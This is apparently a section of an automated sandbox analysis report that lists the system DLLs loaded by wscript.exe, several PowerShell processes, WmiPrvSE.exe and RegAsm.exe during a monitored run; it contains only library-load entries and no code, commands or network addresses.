Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: comsvcs.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
